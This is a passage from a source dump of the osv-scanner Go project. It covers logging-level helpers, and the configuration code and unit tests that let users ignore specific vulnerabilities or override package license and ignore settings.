HasErrored() bool HasErroredBecauseInvalidConfig() bool SetLevel(level slog.Leveler) } // SendEverythingToStderr tells the logger (if its in use) to send all logs // to stderr regardless of their level. // // This is useful if we're expecting to output structured data to stdout such // as JSON, which cannot be mixed with other output. func SendEverythingToStderr() { l, ok := slog.Default().Handler().(CmdLogger) if ok { l.SendEverythingToStderr() } } ================================================ FILE: internal/cmdlogger/level.go ================================================ package cmdlogger import ( "fmt" "log/slog" "strings" ) var levels = []string{ "error", "warn", "info", } func Levels() []string { return levels } func ParseLevel(text string) (slog.Level, error) { switch text { case "error": return slog.LevelError, nil case "warn": return slog.LevelWarn, nil case "info": return slog.LevelInfo, nil default: return slog.LevelInfo, fmt.Errorf("invalid verbosity level \"%s\" - must be one of: %s", text, strings.Join(Levels(), ", ")) } } ================================================ FILE: internal/cmdlogger/level_test.go ================================================ package cmdlogger_test import ( "log/slog" "testing" "github.com/google/osv-scanner/v2/internal/cmdlogger" ) func TestParseVerbosityLevel_GivenValidLevels(t *testing.T) { t.Parallel() tests := []struct { input string level slog.Level }{ {input: "error", level: slog.LevelError}, {input: "warn", level: slog.LevelWarn}, {input: "info", level: slog.LevelInfo}, } for _, tt := range tests { lvl, err := cmdlogger.ParseLevel(tt.input) if err != nil { t.Error(err) } if lvl != tt.level { t.Errorf("level should be supported: %s", tt.input) } } } func TestParseVerbosityLevel_GivenInvalidLevels(t *testing.T) { t.Parallel() _, err := cmdlogger.ParseLevel("invalidlvl") if err == nil { t.Error("expected invalid level to be an error") } } ================================================ FILE: internal/cmdlogger/scalibr.go ================================================ package cmdlogger import ( "fmt" "log/slog" "github.com/google/osv-scalibr/log" ) var _ log.Logger = &ScalibrAdapter{} type ScalibrAdapter struct { Logger *slog.Logger } func (s *ScalibrAdapter) Errorf(format string, args ...any) { s.Logger.Error(fmt.Sprintf(format, args...)) } func (s *ScalibrAdapter) Error(args ...any) { s.Logger.Error(fmt.Sprint(args...)) } func (s *ScalibrAdapter) Warnf(format string, args ...any) { s.Logger.Warn(fmt.Sprintf(format, args...)) } func (s *ScalibrAdapter) Warn(args ...any) { s.Logger.Warn(fmt.Sprint(args...)) } func (s *ScalibrAdapter) Infof(format string, args ...any) { s.Logger.Info(fmt.Sprintf(format, args...)) } func (s *ScalibrAdapter) Info(args ...any) { s.Logger.Info(fmt.Sprint(args...)) } func (s *ScalibrAdapter) Debugf(format string, args ...any) { s.Logger.Debug(fmt.Sprintf(format, args...)) } func (s *ScalibrAdapter) Debug(args ...any) { s.Logger.Debug(fmt.Sprint(args...)) } ================================================ FILE: internal/cmdlogger/static.go ================================================ package cmdlogger import "log/slog" func SetHasErrored() { l, ok := slog.Default().Handler().(CmdLogger) if ok { l.SetHasErrored() } } // HasErrored returns true if there have been any calls to Handle with // a level of [slog.LevelError], assuming the logger is a [Handler]. // // If the logger is not a [Handler], this will always return false. func HasErrored() bool { l, ok := slog.Default().Handler().(CmdLogger) if ok { return l.HasErrored() } return false } func SetLevel(level slog.Leveler) { l, ok := slog.Default().Handler().(CmdLogger) if ok { l.SetLevel(level) } } ================================================ FILE: internal/config/config.go ================================================ // Package config manages the configuration for osv-scanner. package config import ( "slices" "time" "github.com/google/osv-scalibr/extractor" "github.com/google/osv-scanner/v2/internal/cmdlogger" "github.com/google/osv-scanner/v2/internal/imodels" ) var OSVScannerConfigName = "osv-scanner.toml" type Config struct { IgnoredVulns []*IgnoreEntry `toml:"IgnoredVulns"` PackageOverrides []PackageOverrideEntry `toml:"PackageOverrides"` GoVersionOverride string `toml:"GoVersionOverride"` // The path to config file that this config was loaded from, // set by the scanner after having successfully parsed the file LoadPath string `toml:"-"` } type IgnoreEntry struct { ID string `toml:"id"` IgnoreUntil time.Time `toml:"ignoreUntil"` Reason string `toml:"reason"` Used bool `toml:"-"` } func (ie *IgnoreEntry) MarkAsUsed() { ie.Used = true } type PackageOverrideEntry struct { Name string `toml:"name"` // If the version is empty, the entry applies to all versions. Version string `toml:"version"` Ecosystem string `toml:"ecosystem"` Group string `toml:"group"` Ignore bool `toml:"ignore"` Vulnerability Vulnerability `toml:"vulnerability"` License License `toml:"license"` EffectiveUntil time.Time `toml:"effectiveUntil"` Reason string `toml:"reason"` } func (e PackageOverrideEntry) matches(pkg *extractor.Package) bool { if e.Name != "" && e.Name != imodels.Name(pkg) { return false } if e.Version != "" && e.Version != imodels.Version(pkg) { return false } // If there is an ecosystem filter, the filter must not match both the: // - Full ecosystem + suffix // - The base ecosystem if e.Ecosystem != "" && (e.Ecosystem != imodels.Ecosystem(pkg).String() && e.Ecosystem != string(imodels.Ecosystem(pkg).Ecosystem)) { return false } if e.Group != "" && !slices.Contains(imodels.DepGroups(pkg), e.Group) { return false } return true } type Vulnerability struct { Ignore bool `toml:"ignore"` } type License struct { Override []string `toml:"override"` Ignore bool `toml:"ignore"` } func (c *Config) UnusedIgnoredVulns() []*IgnoreEntry { unused := make([]*IgnoreEntry, 0, len(c.IgnoredVulns)) for _, entry := range c.IgnoredVulns { if !entry.Used { unused = append(unused, entry) } } return unused } func (c *Config) ShouldIgnore(vulnID string) (bool, *IgnoreEntry) { index := slices.IndexFunc(c.IgnoredVulns, func(e *IgnoreEntry) bool { return e.ID == vulnID }) if index == -1 { return false, &IgnoreEntry{} } ignoredLine := c.IgnoredVulns[index] return shouldIgnoreTimestamp(ignoredLine.IgnoreUntil), ignoredLine } func (c *Config) filterPackageVersionEntries(pkg *extractor.Package, condition func(PackageOverrideEntry) bool) (bool, PackageOverrideEntry) { index := slices.IndexFunc(c.PackageOverrides, func(e PackageOverrideEntry) bool { return e.matches(pkg) && condition(e) }) if index == -1 { return false, PackageOverrideEntry{} } ignoredLine := c.PackageOverrides[index] return shouldIgnoreTimestamp(ignoredLine.EffectiveUntil), ignoredLine } // ShouldIgnorePackage determines if the given package should be ignored based on override entries in the config func (c *Config) ShouldIgnorePackage(pkg *extractor.Package) (bool, PackageOverrideEntry) { return c.filterPackageVersionEntries(pkg, func(e PackageOverrideEntry) bool { return e.Ignore }) } // ShouldIgnorePackageVulnerabilities determines if the given package should have its vulnerabilities ignored based on override entries in the config func (c *Config) ShouldIgnorePackageVulnerabilities(pkg *extractor.Package) bool { overrides, _ := c.filterPackageVersionEntries(pkg, func(e PackageOverrideEntry) bool { return e.Vulnerability.Ignore }) return overrides } // ShouldOverridePackageLicense determines if the given package should have its license ignored or changed based on override entries in the config func (c *Config) ShouldOverridePackageLicense(pkg *extractor.Package) (bool, PackageOverrideEntry) { return c.filterPackageVersionEntries(pkg, func(e PackageOverrideEntry) bool { return e.License.Ignore || len(e.License.Override) > 0 }) } func shouldIgnoreTimestamp(ignoreUntil time.Time) bool { if ignoreUntil.IsZero() { // If IgnoreUntil is not set, should ignore. return true } // Should ignore if IgnoreUntil is still after current time // Takes timezone offsets into account if it is specified. otherwise it's using local time return ignoreUntil.After(time.Now()) } func (c *Config) warnAboutDuplicates() { seen := make(map[string]struct{}) for _, vuln := range c.IgnoredVulns { if _, ok := seen[vuln.ID]; ok { cmdlogger.Warnf("warning: %s has multiple ignores for %s - only the first will be used!", c.LoadPath, vuln.ID) } seen[vuln.ID] = struct{}{} } } ================================================ FILE: internal/config/config_internal_test.go ================================================ package config import ( "fmt" "reflect" "strings" "testing" "time" "github.com/google/go-cmp/cmp" "github.com/google/osv-scalibr/extractor" apkmetadata "github.com/google/osv-scalibr/extractor/filesystem/os/apk/metadata" "github.com/google/osv-scalibr/extractor/filesystem/osv" "github.com/google/osv-scalibr/purl" ) // Attempts to normalize any file paths in the given `output` so that they can // be compared reliably regardless of the file path separator being used. // // Namely, escaped forward slashes are replaced with backslashes. func normalizeFilePaths(t *testing.T, output string) string { t.Helper() return strings.ReplaceAll(strings.ReplaceAll(output, "\\\\", "/"), "\\", "/") } func Test_normalizeConfigLoadPath(t *testing.T) { t.Parallel() type args struct { target string } tests := []struct { name string args args want string wantErr bool }{ { name: "target_does_not_exist", args: args{ target: "./testdata/testdatainner/does-not-exist", }, want: "", wantErr: true, }, { name: "target_is_file_in_directory", args: args{ target: "./testdata/testdatainner/innerFolder/test.yaml", }, want: "testdata/testdatainner/innerFolder/osv-scanner.toml", wantErr: false, }, { name: "target_is_inner_directory_with_trailing_slash", args: args{ target: "./testdata/testdatainner/innerFolder/", }, want: "testdata/testdatainner/innerFolder/osv-scanner.toml", wantErr: false, }, { name: "target_is_inner_directory_without_trailing_slash", args: args{ target: "./testdata/testdatainner/innerFolder", }, want: "testdata/testdatainner/innerFolder/osv-scanner.toml", wantErr: false, }, { name: "target_is_directory_with_trailing_slash", args: args{ target: "./testdata/testdatainner/", }, want: "testdata/testdatainner/osv-scanner.toml", wantErr: false, }, { name: "target_is_file_in_directory", args: args{ target: "./testdata/testdatainner/some-manifest.yaml", }, want: "testdata/testdatainner/osv-scanner.toml", wantErr: false, }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { t.Parallel() got, err := normalizeConfigLoadPath(tt.args.target) if (err != nil) != tt.wantErr { t.Errorf("normalizeConfigLoadPath() error = %v, wantErr %v", err, tt.wantErr) return } got = normalizeFilePaths(t, got) if got != tt.want { t.Errorf("normalizeConfigLoadPath() got = %v, want %v", got, tt.want) } }) } } func Test_tryLoadConfig(t *testing.T) { t.Parallel() type args struct { configPath string } tests := []struct { name string args args want Config wantErr bool }{ { name: "config_does_not_exist", args: args{ configPath: "./testdata/testdatainner/does-not-exist", }, want: Config{}, wantErr: true, }, { name: "config_has_some_ignored_vulnerabilities_and_package_overrides", args: args{ configPath: "./testdata/testdatainner/osv-scanner.toml", }, want: Config{ LoadPath: "./testdata/testdatainner/osv-scanner.toml", IgnoredVulns: []*IgnoreEntry{ { ID: "GO-2022-0968", }, { ID: "GO-2022-1059", }, }, PackageOverrides: []PackageOverrideEntry{ { Name: "lib", Version: "1.0.0", Ecosystem: "Go", Ignore: true, Reason: "abc", }, { Name: "my-pkg", Version: "1.0.0", Ecosystem: "Go", Reason: "abc", Ignore: true, License: License{ Override: []string{"MIT", "0BSD"}, }, }, }, }, wantErr: false, }, { name: "load_path_cannot_be_overridden_via_config", args: args{ configPath: "./testdata/testdatainner/osv-scanner-load-path.toml", }, want: Config{ LoadPath: "", }, wantErr: true, }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { t.Parallel() got, err := tryLoadConfig(tt.args.configPath) if (err != nil) != tt.wantErr { t.Errorf("tryLoadConfig() error = %v, wantErr %v", err, tt.wantErr) return } if diff := cmp.Diff(tt.want, got); diff != "" { t.Errorf("tryLoadConfig() mismatch (-want +got):\n%s", diff) } }) } } func TestTryLoadConfig_UnknownKeys(t *testing.T) { t.Parallel() tests := []struct { configPath string unknownMsg string }{ { configPath: "./testdata/unknown-key-1.toml", unknownMsg: "IgnoredVulns.ignoreUntilTime", }, { configPath: "./testdata/unknown-key-2.toml", unknownMsg: "IgnoredVulns.ignoreUntiI", }, { configPath: "./testdata/unknown-key-3.toml", unknownMsg: "IgnoredVulns.reasoning", }, { configPath: "./testdata/unknown-key-4.toml", unknownMsg: "PackageOverrides.skip", }, { configPath: "./testdata/unknown-key-5.toml", unknownMsg: "PackageOverrides.license.skip", }, { configPath: "./testdata/unknown-key-6.toml", unknownMsg: "RustVersionOverride", }, { configPath: "./testdata/unknown-key-7.toml", unknownMsg: "RustVersionOverride, PackageOverrides.skip", }, } for _, testData := range tests { c, err := tryLoadConfig(testData.configPath) // we should always be returning an empty config on error if diff := cmp.Diff(Config{}, c); diff != "" { t.Errorf("tryLoadConfig() mismatch (-want +got):\n%s", diff) } if err == nil { t.Fatal("tryLoadConfig() did not return an error") } wantMsg := fmt.Sprintf("unknown keys in config file: %v", testData.unknownMsg) if err.Error() != wantMsg { t.Errorf("tryLoadConfig() error = '%v', want '%s'", err, wantMsg) } } } func TestConfig_ShouldIgnore(t *testing.T) { t.Parallel() type args struct { vulnID string } tests := []struct { name string config Config args args wantOk bool wantEntry *IgnoreEntry }{ // entry exists { name: "", config: Config{ IgnoredVulns: []*IgnoreEntry{ { ID: "GHSA-123", IgnoreUntil: time.Time{}, Reason: "", }, }, }, args: args{ vulnID: "GHSA-123", }, wantOk: true, wantEntry: &IgnoreEntry{ ID: "GHSA-123", IgnoreUntil: time.Time{}, Reason: "", }, }, // entry does not exist { name: "", config: Config{ IgnoredVulns: []*IgnoreEntry{ { ID: "GHSA-123", IgnoreUntil: time.Time{}, Reason: "", }, }, }, args: args{ vulnID: "nonexistent", }, wantOk: false, wantEntry: &IgnoreEntry{}, }, // ignored until a time in the past { name: "", config: Config{ IgnoredVulns: []*IgnoreEntry{ { ID: "GHSA-123", IgnoreUntil: time.Now().Add(-time.Hour).Round(time.Second), Reason: "", }, }, }, args: args{ vulnID: "GHSA-123", }, wantOk: false, wantEntry: &IgnoreEntry{ ID: "GHSA-123", IgnoreUntil: time.Now().Add(-time.Hour).Round(time.Second), Reason: "", }, }, // ignored until a time in the future { name: "", config: Config{ IgnoredVulns: []*IgnoreEntry{ { ID: "GHSA-123", IgnoreUntil: time.Now().Add(time.Hour).Round(time.Second), Reason: "", }, }, }, args: args{ vulnID: "GHSA-123", }, wantOk: true, wantEntry: &IgnoreEntry{ ID: "GHSA-123", IgnoreUntil: time.Now().Add(time.Hour).Round(time.Second), Reason: "", }, }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { t.Parallel() gotOk, gotEntry := tt.config.ShouldIgnore(tt.args.vulnID) if gotOk != tt.wantOk { t.Errorf("ShouldIgnore() gotOk = %v, wantOk %v", gotOk, tt.wantOk) } if !reflect.DeepEqual(gotEntry, tt.wantEntry) { t.Errorf("ShouldIgnore() gotEntry = %v, wantEntry %v", gotEntry, tt.wantEntry) } }) } } func TestConfig_ShouldIgnorePackage(t *testing.T) { t.Parallel() tests := []struct { name string config Config args *extractor.Package wantOk bool wantEntry PackageOverrideEntry }{ { name: "Everything-level_entry_exists", config: Config{ PackageOverrides: []PackageOverrideEntry{ { Ignore: true, EffectiveUntil: time.Time{}, Reason: "abc", }, }, }, args: &extractor.Package{ Name: "lib1", Version: "1.0.0", Metadata: osv.DepGroupMetadata{ DepGroupVals: []string{"dev"}, }, }, wantOk: true, wantEntry: PackageOverrideEntry{ Ignore: true, EffectiveUntil: time.Time{}, Reason: "abc", }, }, // ------------------------------------------------------------------------- { name: "Ecosystem-level_entry_exists_and_does_match", config: Config{ PackageOverrides: []PackageOverrideEntry{ { Ecosystem: "Go", Ignore: true, EffectiveUntil: time.Time{}, Reason: "abc", }, }, }, args: &extractor.Package{ Name: "lib1", Version: "1.0.0", PURLType: purl.TypeGolang, Metadata: osv.DepGroupMetadata{ DepGroupVals: []string{"dev"}, }, }, wantOk: true, wantEntry: PackageOverrideEntry{ Ecosystem: "Go", Ignore: true, EffectiveUntil: time.Time{}, Reason: "abc", }, }, { name: "Ecosystem-level_entry_exists_and_does_not_match", config: Config{ PackageOverrides: []PackageOverrideEntry{ { Ecosystem: "Go", Ignore: true, EffectiveUntil: time.Time{}, Reason: "abc", }, }, }, args: &extractor.Package{ Name: "lib2", Version: "1.0.0", PURLType: "npm", Metadata: osv.DepGroupMetadata{ DepGroupVals: []string{"dev"}, }, }, wantOk: false, wantEntry: PackageOverrideEntry{}, }, // ------------------------------------------------------------------------- { name: "Ecosystem-level_entry_with_suffix_exists_and_does_match", config: Config{ PackageOverrides: []PackageOverrideEntry{ { Ecosystem: "Alpine:v3.20", Ignore: true, EffectiveUntil: time.Time{}, Reason: "abc", }, }, }, args: &extractor.Package{ Name: "bin1", Version: "1.0.0", PURLType: purl.TypeApk, Metadata: &apkmetadata.Metadata{ PackageName: "bin1", OSID: "Alpine", OSVersionID: "3.20", }, }, wantOk: true, wantEntry: PackageOverrideEntry{ Ecosystem: "Alpine:v3.20", Ignore: true, EffectiveUntil: time.Time{}, Reason: "abc", }, }, { name: "Ecosystem-level_entry_with_suffix_exists_and_does_not_match", config: Config{ PackageOverrides: []PackageOverrideEntry{ { Ecosystem: "Alpine:v3.20", Ignore: true, EffectiveUntil: time.Time{}, Reason: "abc", }, }, }, args: &extractor.Package{ Name: "bin2", Version: "1.0.0", PURLType: purl.TypeApk, Metadata: &apkmetadata.Metadata{ PackageName: "bin1", OSID: "Alpine", OSVersionID: "3.19", }, }, wantOk: false, wantEntry: PackageOverrideEntry{}, }, { name: "Ecosystem-level_entry_without_suffix_exists_and_does_match", config: Config{ PackageOverrides: []PackageOverrideEntry{ { Ecosystem: "Alpine", Ignore: true, EffectiveUntil: time.Time{}, Reason: "abc", }, }, }, args: &extractor.Package{ Name: "bin1", Version: "1.0.0", PURLType: purl.TypeApk, Metadata: &apkmetadata.Metadata{ PackageName: "bin1", OSID: "Alpine", OSVersionID: "3.20", }, }, wantOk: true, wantEntry: PackageOverrideEntry{ Ecosystem: "Alpine", Ignore: true, EffectiveUntil: time.Time{}, Reason: "abc", }, }, // ------------------------------------------------------------------------- { name: "Group-level_entry_exists_and_does_match", config: Config{ PackageOverrides: []PackageOverrideEntry{ { Group: "dev", Ignore: true, EffectiveUntil: time.Time{}, Reason: "abc", }, }, }, args: &extractor.Package{ Name: "lib1", Version: "1.0.0", PURLType: purl.TypeGolang, Metadata: osv.DepGroupMetadata{ DepGroupVals: []string{"dev"}, }, }, wantOk: true, wantEntry: PackageOverrideEntry{ Group: "dev", Ignore: true, EffectiveUntil: time.Time{}, Reason: "abc", }, }, { name: "Group-level_entry_exists_and_does_not_match", config: Config{ PackageOverrides: []PackageOverrideEntry{ { Group: "dev", Ignore: true, EffectiveUntil: time.Time{}, Reason: "abc", }, }, }, args: &extractor.Package{ Name: "lib2", Version: "1.0.0", PURLType: "npm", Metadata: osv.DepGroupMetadata{ DepGroupVals: []string{"optional"}, }, }, wantOk: false, wantEntry: PackageOverrideEntry{}, }, { name: "Group-level_entry_exists_and_does_not_match_when_empty", config: Config{ PackageOverrides: []PackageOverrideEntry{ { Group: "dev", Ignore: true, EffectiveUntil: time.Time{}, Reason: "abc", }, }, }, args: &extractor.Package{ Name: "lib2", Version: "1.0.0", PURLType: "npm", }, wantOk: false, wantEntry: PackageOverrideEntry{}, }, // ------------------------------------------------------------------------- { name: "Version-level_entry_exists_and_does_match", config: Config{ PackageOverrides: []PackageOverrideEntry{ { Version: "1.0.0", Ignore: true, EffectiveUntil: time.Time{}, Reason: "abc", }, }, }, args: &extractor.Package{ Name: "lib1", Version: "1.0.0", PURLType: purl.TypeGolang, Metadata: osv.DepGroupMetadata{ DepGroupVals: []string{"dev"}, }, }, wantOk: true, wantEntry: PackageOverrideEntry{ Version: "1.0.0", Ignore: true, EffectiveUntil: time.Time{}, Reason: "abc", }, }, { name: "Version-level_entry_exists_and_does_not_match", config: Config{ PackageOverrides: []PackageOverrideEntry{ { Version: "1.0.0", Ignore: true, EffectiveUntil: time.Time{}, Reason: "abc", }, }, }, args: &extractor.Package{ Name: "lib1", Version: "1.0.1", PURLType: purl.TypeGolang, Metadata: osv.DepGroupMetadata{ DepGroupVals: []string{"dev"}, }, }, wantOk: false, wantEntry: PackageOverrideEntry{}, }, // ------------------------------------------------------------------------- { name: "Name-level_entry_exists_and_does_match", config: Config{ PackageOverrides: []PackageOverrideEntry{ { Name: "lib1", Ignore: true, EffectiveUntil: time.Time{}, Reason: "abc", }, }, }, args: &extractor.Package{ Name: "lib1", Version: "1.0.0", PURLType: purl.TypeGolang, Metadata: osv.DepGroupMetadata{ DepGroupVals: []string{"dev"}, }, }, wantOk: true, wantEntry: PackageOverrideEntry{ Name: "lib1", Ignore: true, EffectiveUntil: time.Time{}, Reason: "abc", }, }, { name: "Name-level_entry_exists_and_does_not_match", config: Config{ PackageOverrides: []PackageOverrideEntry{ { Name: "lib1", Ignore: true, EffectiveUntil: time.Time{}, Reason: "abc", }, }, }, args: &extractor.Package{ Name: "lib2", Version: "1.0.0", PURLType: "npm", Metadata: osv.DepGroupMetadata{ DepGroupVals: []string{"dev"}, }, }, wantOk: false, wantEntry: PackageOverrideEntry{}, }, // ------------------------------------------------------------------------- { name: "Name,_Version,_and_Ecosystem_entry_exists", config: Config{ PackageOverrides: []PackageOverrideEntry{ { Name: "lib1", Version: "1.0.0", Ecosystem: "Go", Ignore: true, EffectiveUntil: time.Time{}, Reason: "abc", }, }, }, args: &extractor.Package{ Name: "lib1", Version: "1.0.0", PURLType: purl.TypeGolang, }, wantOk: true, wantEntry: PackageOverrideEntry{ Name: "lib1", Version: "1.0.0", Ecosystem: "Go", Ignore: true, EffectiveUntil: time.Time{}, Reason: "abc", }, }, { name: "Name_and_Ecosystem_entry_exists", config: Config{ PackageOverrides: []PackageOverrideEntry{ { Name: "lib1", Ecosystem: "Go", Ignore: true, EffectiveUntil: time.Time{}, Reason: "abc", }, }, }, args: &extractor.Package{ Name: "lib1", Version: "1.0.0", PURLType: purl.TypeGolang, }, wantOk: true, wantEntry: PackageOverrideEntry{ Name: "lib1", Ecosystem: "Go", Ignore: true, EffectiveUntil: time.Time{}, Reason: "abc", }, }, { name: "Name,_Ecosystem,_and_Group_entry_exists_and_matches", config: Config{ PackageOverrides: []PackageOverrideEntry{ { Name: "lib1", Ecosystem: "Go", Group: "dev", Ignore: true, EffectiveUntil: time.Time{}, Reason: "abc", }, }, }, args: &extractor.Package{ Name: "lib1", Version: "1.0.0", PURLType: purl.TypeGolang, Metadata: osv.DepGroupMetadata{ DepGroupVals: []string{"dev"}, }, }, wantOk: true, wantEntry: PackageOverrideEntry{ Name: "lib1", Ecosystem: "Go", Group: "dev", Ignore: true, EffectiveUntil: time.Time{}, Reason: "abc", }, }, { name: "Name,_Ecosystem,_and_Group_entry_exists_but_does_not_match", config: Config{ PackageOverrides: []PackageOverrideEntry{ { Name: "lib1", Ecosystem: "Go", Group: "dev", Ignore: true, EffectiveUntil: time.Time{}, Reason: "abc", }, }, }, args: &extractor.Package{ Name: "lib1", Version: "1.0.0", PURLType: purl.TypeGolang, Metadata: osv.DepGroupMetadata{ DepGroupVals: []string{"prod"}, }, }, wantOk: false, wantEntry: PackageOverrideEntry{}, }, { name: "Entry_doesn't_exist", config: Config{ PackageOverrides: []PackageOverrideEntry{ { Name: "lib1", Version: "2.0.0", Ecosystem: "Go", Ignore: false, EffectiveUntil: time.Time{}, Reason: "abc", }, { Name: "lib2", Version: "2.0.0", Ignore: true, Ecosystem: "Go", EffectiveUntil: time.Time{}, Reason: "abc", }, }, }, args: &extractor.Package{ Name: "lib1", Version: "2.0.0", PURLType: purl.TypeGolang, }, wantOk: false, wantEntry: PackageOverrideEntry{}, }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { t.Parallel() gotOk, gotEntry := tt.config.ShouldIgnorePackage(tt.args) if gotOk != tt.wantOk { t.Errorf("ShouldIgnorePackage() gotOk = %v, wantOk %v", gotOk, tt.wantOk) } if !reflect.DeepEqual(gotEntry, tt.wantEntry) { t.Errorf("ShouldIgnorePackage() gotEntry = %v, wantEntry %v", gotEntry, tt.wantEntry) } }) } } func TestConfig_ShouldIgnorePackageVulnerabilities(t *testing.T) { t.Parallel() tests := []struct { name string config Config args *extractor.Package wantOk bool }{ { name: "Exact_version_entry_exists_with_ignore", config: Config{ PackageOverrides: []PackageOverrideEntry{ { Name: "lib1", Version: "1.0.0", Ecosystem: "Go", Vulnerability: Vulnerability{ Ignore: true, }, Reason: "abc", }, }, }, args: &extractor.Package{ Name: "lib1", Version: "1.0.0", PURLType: purl.TypeGolang, }, wantOk: true, }, { name: "Version_entry_doesn't_exist_with_ignore", config: Config{ PackageOverrides: []PackageOverrideEntry{ { Name: "lib1", Version: "1.0.0", Ecosystem: "Go", Vulnerability: Vulnerability{ Ignore: true, }, Reason: "abc", }, }, }, args: &extractor.Package{ Name: "lib1", Version: "1.0.1", PURLType: purl.TypeGolang, }, wantOk: false, }, { name: "Name_matches_with_ignore", config: Config{ PackageOverrides: []PackageOverrideEntry{ { Name: "lib1", Ecosystem: "Go", Vulnerability: Vulnerability{ Ignore: true, }, Reason: "abc", }, }, }, args: &extractor.Package{ Name: "lib1", Version: "1.0.1", PURLType: purl.TypeGolang, }, wantOk: true, }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { t.Parallel() gotOk := tt.config.ShouldIgnorePackageVulnerabilities(tt.args) if gotOk != tt.wantOk { t.Errorf("ShouldIgnorePackageVulnerabilities() gotOk = %v, wantOk %v", gotOk, tt.wantOk) } }) } } func TestConfig_ShouldOverridePackageLicense(t *testing.T) { t.Parallel() tests := []struct { name string config Config args *extractor.Package wantOk bool wantEntry PackageOverrideEntry }{ { name: "Exact_version_entry_exists_with_override", config: Config{ PackageOverrides: []PackageOverrideEntry{ { Name: "lib1", Version: "1.0.0", Ecosystem: "Go", License: License{ Override: []string{"mit"}, }, Reason: "abc", }, }, }, args: &extractor.Package{ Name: "lib1", Version: "1.0.0", PURLType: purl.TypeGolang, }, wantOk: true, wantEntry: PackageOverrideEntry{ Name: "lib1", Version: "1.0.0", Ecosystem: "Go", License: License{ Override: []string{"mit"}, }, Reason: "abc", }, }, { name: "Exact_version_entry_exists_with_ignore", config: Config{ PackageOverrides: []PackageOverrideEntry{ { Name: "lib1", Version: "1.0.0", Ecosystem: "Go", License: License{ Ignore: true, }, Reason: "abc", }, }, }, args: &extractor.Package{ Name: "lib1", Version: "1.0.0", PURLType: purl.TypeGolang, }, wantOk: true, wantEntry: PackageOverrideEntry{ Name: "lib1", Version: "1.0.0", Ecosystem: "Go", License: License{ Ignore: true, }, Reason: "abc", }, }, { name: "Version_entry_doesn't_exist_with_override", config: Config{ PackageOverrides: []PackageOverrideEntry{ { Name: "lib1", Version: "1.0.0", Ecosystem: "Go", License: License{ Override: []string{"mit"}, }, Reason: "abc", }, }, }, args: &extractor.Package{ Name: "lib1", Version: "1.0.1", PURLType: purl.TypeGolang, }, wantOk: false, wantEntry: PackageOverrideEntry{}, }, { name: "Version_entry_doesn't_exist_with_ignore", config: Config{ PackageOverrides: []PackageOverrideEntry{ { Name: "lib1", Version: "1.0.0", Ecosystem: "Go", License: License{ Ignore: true, }, Reason: "abc", }, }, }, args: &extractor.Package{ Name: "lib1", Version: "1.0.1", PURLType: purl.TypeGolang, }, wantOk: false, wantEntry: PackageOverrideEntry{}, }, { name: "Name_matches_with_override", config: Config{ PackageOverrides: []PackageOverrideEntry{ { Name: "lib1", Ecosystem: "Go", License: License{ Override: []string{"mit"}, }, Reason: "abc", }, }, }, args: &extractor.Package{ Name: "lib1", Version: "1.0.1", PURLType: purl.TypeGolang, }, wantOk: true, wantEntry: PackageOverrideEntry{ Name: "lib1", Ecosystem: "Go", License: License{ Override: []string{"mit"}, }, Reason: "abc", }, }, { name: "Name_matches_with_ignore", config: Config{ PackageOverrides: []PackageOverrideEntry{ { Name: "lib1", Ecosystem: "Go", License: License{ Ignore: true, }, Reason: "abc", }, }, }, args: &extractor.Package{ Name: "lib1", Version: "1.0.1", PURLType: purl.TypeGolang, }, wantOk: true, wantEntry: PackageOverrideEntry{ Name: "lib1", Ecosystem: "Go", License: License{ Ignore: true, }, Reason: "abc", }, }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { t.Parallel() gotOk, gotEntry := tt.config.ShouldOverridePackageLicense(tt.args) if gotOk != tt.wantOk { t.Errorf("ShouldOverridePackageLicense() gotOk = %v, wantOk %v", gotOk, tt.wantOk) } if !reflect.DeepEqual(gotEntry, tt.wantEntry) { t.Errorf("ShouldOverridePackageLicense() gotEntry = %v, wantEntry %v", gotEntry, tt.wantEntry) } }) } } ================================================ FILE: internal/config/manager.go ================================================ package config import ( "errors" "fmt" "os" "path/filepath" "strings" "github.com/BurntSushi/toml" "github.com/google/osv-scanner/v2/internal/cmdlogger" ) type Manager struct { // Override to replace all other configs OverrideConfig *Config // Config to use if no config file is found alongside manifests DefaultConfig Config // Cache to store loaded configs ConfigMap map[string]Config } // UseOverride updates the Manager to use the config at the given path in place // of any other config files that would be loaded when calling Get func (m *Manager) UseOverride(configPath string) error { config, configErr := tryLoadConfig(configPath) if configErr != nil { return configErr } m.OverrideConfig = &config return nil } // Get returns the appropriate config to use based on the targetPath func (m *Manager) Get(targetPath string) Config { if m.OverrideConfig != nil { return *m.OverrideConfig } configPath, err := normalizeConfigLoadPath(targetPath) if err != nil { // TODO: This can happen when target is not a file (e.g. Docker container, git hash...etc.) // Figure out a more robust way to load config from non files // r.PrintErrorf("Can't find config path: %s\n", err) return Config{} } config, alreadyExists := m.ConfigMap[configPath] if alreadyExists { return config } config, configErr := tryLoadConfig(configPath) if configErr == nil { cmdlogger.Infof("Loaded filter from: %s", config.LoadPath) } else { // anything other than the config file not existing is most likely due to an invalid config file if !errors.Is(configErr, os.ErrNotExist) { cmdlogger.Errorf("Ignored invalid config file at %s because: %v", configPath, configErr) } // If config doesn't exist, use the default config config = m.DefaultConfig } m.ConfigMap[configPath] = config return config } func (m *Manager) GetUnusedIgnoreEntries() map[string][]*IgnoreEntry { entries := make(map[string][]*IgnoreEntry) for _, config := range m.ConfigMap { unusedEntries := config.UnusedIgnoredVulns() if len(unusedEntries) > 0 { entries[config.LoadPath] = unusedEntries } } if m.OverrideConfig != nil { unusedEntries := m.OverrideConfig.UnusedIgnoredVulns() if len(unusedEntries) > 0 { entries[m.OverrideConfig.LoadPath] = unusedEntries } } return entries } // Finds the containing folder of `target`, then appends osvScannerConfigName func normalizeConfigLoadPath(target string) (string, error) { stat, err := os.Stat(target) if err != nil { return "", fmt.Errorf("failed to stat target: %w", err) } var containingFolder string if !stat.IsDir() { containingFolder = filepath.Dir(target) } else { containingFolder = target } configPath := filepath.Join(containingFolder, OSVScannerConfigName) return configPath, nil } // tryLoadConfig attempts to parse the config file at the given path as TOML, // returning the Config object if successful or otherwise the error func tryLoadConfig(configPath string) (Config, error) { config := Config{} c, err := 